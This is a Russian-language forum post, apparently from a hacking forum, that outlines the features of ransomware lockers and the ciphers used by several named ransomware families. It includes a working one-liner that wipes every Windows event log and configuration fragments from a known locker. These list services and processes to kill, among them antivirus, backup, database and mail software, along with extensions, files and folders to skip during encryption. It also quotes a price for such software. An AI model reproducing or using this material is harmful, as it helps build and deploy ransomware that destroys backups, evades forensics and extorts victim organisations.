Man
Professional
- Messages
- 3,046
- Reaction score
- 572
- Points
- 113
Программа-вымогатель – это вредоносное программное обеспечение, которое блокирует устройство или зашифровывает его содержимое и вымогает деньги у компании.
Функционал в котором обычно нуждаются злоумышленники
1. Завершение процессов и сервисов системы.
2. Удаление резервных копий и теневых копий.
3. Установка обоев рабочего стола и иконок с изменением расширения файлов на .locker (или любое другое расширение, которое настраивается в конфиге).
4. Поддержка 32-битных и 64-битных систем.
5. Отдельная версия для операционной системы Linux.
6. "Антивиртуальная" защита (определение запуска в виртуальной среде для усложнения реверс-инжиниринга).
7. Очистка системных логов.
8. Закрепление на устройстве для обеспечения устойчивости.
9. Увеличение прав доступа.
10. Функция удаления самого себя.
11. Гибкие параметры настройки.
Шифрование, которое используют уже известные локеры
Code:
ransomhub ChaCha20 + AES256
eldorado ChaCha20 + RSA-OAEP
qillin Chacha20 + RSA-4096Как очистить логи
Для этого используется стандартная утилита в windows: wevtutil.exe
Code:
for /F "tokens=*" %1 in ('wevtutil el') do wevtutil cl "%1"Рассматриваем функционал известного локера
- Убиваем сервисы, которые относятся к антивирусной защите, бэкапам, субд, почтовый клиент
Code:
"kill_services": "vss;sql;svc$;memtas;mepocs;msexchange;sophos;veeam;backup- Закрываем все процессы, отвечающие за офисную хренатень
Code:
"kill_processes": "sql;oracle;ocssd;dbsnmp;synctime;agntsvc;isqlplussvc;xfssvccon;mydesktopservice;ocautoupds;encsvc;firefox;tbirdconfig;mydesktopqos;ocomm;dbeng50;sqbcoreservice;excel;infopath;msaccess;mspub;onenote;outlook;powerpnt;steam;thebat;thunderbird;visio;winword;wordpad;notepad;calc;wuauclt;onedrive"- Хацкеры добавляют некоторые расширения в вайтлист сделано это с целью не повредить важные системные файлы. Их нет смысла шифровать.
Code:
"white_extens": "386;adv;ani;bat;bin;cab;cmd;com;cpl;cur;deskthemepack;diagcab;diagcfg;diagpkg;dll;drv;exe;hlp;icl;icns;ico;ics;idx;ldf;lnk;mod;mpa;msc;msp;msstyles;msu;nls;nomedia;ocx;prf;ps1;rom;rtp;scr;shs;spl;sys;theme;themepack;wpx;lock;key;hta;msi;pdb;search-ms",- Другие важные файлы, которые нет смысла шифровать, иначе OS похерит, шрифты, персоналка и т.д
Code:
"white_files": "autorun.inf;boot.ini;bootfont.bin;bootsect.bak;desktop.ini;iconcache.db;ntldr;ntuser.dat;ntuser.dat.log;ntuser.ini;thumbs.db;GDIPFONTCACHEV1.DAT;d3d9caps.dat",- Другие важные папки, которые не нужно шифровать.
Code:
"white_folders": "$recycle.bin;config.msi;$windows.~bt;$windows.~ws;windows;boot;program files;program files (x86);programdata;system volume information;tor browser;windows.old;intel;msocache;perflogs;x64dbg;public;all users;default;microsoft",Например тор они оставляют, чтобы жертва могла связаться и оплатить выкуп. Их задача же не поломать компы, не уничтожить систему, а лишь запретить доступ к важным файлам компании.
Цена подобного софта от 5k
≈ 500 тысяч рублей.
